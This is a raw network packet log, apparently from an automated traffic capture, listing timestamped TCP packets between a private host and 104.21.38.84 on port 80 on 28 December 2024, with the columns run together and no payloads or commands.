                                                                        Dec 28, 2024 20:43:07.480163097 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.480231047 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.635962963 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.636301994 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:07.756051064 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:07.756062984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.142354012 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.159806013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.160877943 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.280448914 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.313497066 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.384448051 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.493146896 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.495301008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.501010895 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.510108948 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.510766029 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.614898920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.615077019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.630970955 CET8049762104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.631091118 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.631138086 CET4976280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.631288052 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.631288052 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:08.750787973 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:08.985441923 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.016171932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.017096996 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.105266094 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.105277061 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.105288029 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.137223959 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.350409031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.350716114 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.470159054 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.470346928 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.716850042 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.882715940 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:09.886603117 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.891638041 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:09.955317020 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.000993967 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.007323027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.078381062 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.079150915 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.198184967 CET8049766104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.198291063 CET4976680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.198635101 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.198755980 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.198853970 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.220232010 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.220375061 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.318754911 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.340245008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.340265036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.548271894 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.668926001 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.668936014 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.668943882 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.753132105 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:10.755019903 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:10.874526978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.087271929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.087455988 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.206985950 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.207194090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.283055067 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.501024961 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.534069061 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.610384941 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.613184929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.614779949 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.656495094 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.657423973 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.734565020 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.776400089 CET8049769104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.776494026 CET4976980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.777019024 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.777132034 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.777249098 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:11.896682024 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.948090076 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:11.948314905 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.067955017 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.068192005 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.126060009 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.245640993 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.245663881 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.245678902 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.478688955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.479485989 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.599004984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.812088013 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.812278986 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:12.933439970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.933478117 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:12.953546047 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.016625881 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.241085052 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.302097082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.310853958 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.313505888 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.357501030 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.395900011 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.430316925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.477435112 CET8049775104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.477488995 CET4977580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:13.515353918 CET8049781104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:13.515419006 CET4978180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235548973 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235702991 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.235754013 CET4981580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235821009 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.235925913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.235955000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.339421988 CET8049815104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.356053114 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.407280922 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.422972918 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.424324989 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.594844103 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.597209930 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.598027945 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:29.715183020 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.715245008 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.715291023 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.717792988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.930958986 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:29.932240963 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.052074909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.052119970 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.366914988 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.422889948 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.459198952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.460010052 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.579642057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.617439032 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.719887018 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.754870892 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.755480051 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.792371988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.792540073 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.878711939 CET8049820104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.878796101 CET4982080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.878926039 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.878994942 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.879215956 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:30.913192034 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:30.913223028 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.000298023 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.235578060 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:31.328547955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.329832077 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:31.355487108 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.355520964 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.355679989 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.449414015 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.662265062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.662457943 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:31.783035040 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:31.783098936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.057957888 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.191565037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.194210052 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.204457045 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.313186884 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.313714027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.391748905 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.438137054 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.439095974 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.548446894 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.732673883 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.732943058 CET8049822104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.732953072 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.733000040 CET4982280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.733033895 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.733181000 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.733264923 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.733274937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.797899008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:32.853406906 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.874682903 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:32.874871016 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.077462912 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.079530954 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.080450058 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.199073076 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.199137926 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.199347019 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.199901104 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.412977934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.413194895 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.533201933 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.533276081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.819001913 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.867135048 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:33.941068888 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:33.949125051 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.058556080 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.068772078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.186651945 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.187393904 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.281681061 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.286019087 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.306688070 CET8049828104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.306890011 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.306945086 CET4982880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.306982994 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.307214022 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.409171104 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.409286022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.429429054 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.657371998 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.779102087 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.779112101 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.779139996 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.820050955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:34.822065115 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:34.941576958 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.154851913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.155025959 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.274585962 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.274897099 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.485979080 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.565001011 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.638271093 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.641242027 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.737128019 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.760818005 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.857160091 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.857973099 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.973993063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.974190950 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.977144957 CET8049834104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.977231979 CET4983480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.977597952 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:35.977714062 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:35.978044987 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:36.093746901 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.093801975 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.097567081 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.329363108 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:36.449099064 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.449141979 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.449311018 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.604887009 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.606076002 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:36.732461929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:36.954319954 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:37.073944092 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.074177027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.164074898 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.204344034 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:37.778947115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.779742002 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:37.801753044 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.906003952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:37.907274008 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.107362986 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.126104116 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.204253912 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.234500885 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.235090971 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.237289906 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.245804071 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.246025085 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.354460955 CET8049839104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.354542017 CET4983980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.354617119 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.354706049 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.354841948 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.407398939 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.474436998 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.680568933 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.704314947 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.823862076 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.823873043 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.823883057 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.907277107 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:38.933027983 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:38.933804035 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:39.053306103 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.282361984 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:39.394028902 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.402162075 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.402352095 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.594784021 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:39.848402023 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:39.891685009 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.086711884 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.091928005 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.133791924 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.188555002 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.214627981 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.249716043 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.250682116 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.369570017 CET8049841104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.369631052 CET4984180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.370141029 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.370630980 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.370738983 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.427592039 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.430212021 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.490233898 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.549803972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.549856901 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.719938040 CET4984780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:40.839607000 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.839637041 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.839684963 CET8049847104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:40.956479073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.621124983 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.776707888 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.777532101 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.897550106 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.110094070 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.110275984 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.236579895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.236596107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.282757044 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.329174995 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.523976088 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.579180002 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.601788998 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.604264021 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.649317026 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.650353909 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.724215984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.769211054 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.769274950 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.769864082 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.769948006 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.770175934 CET4989280192.168.2.4104.21.38.84
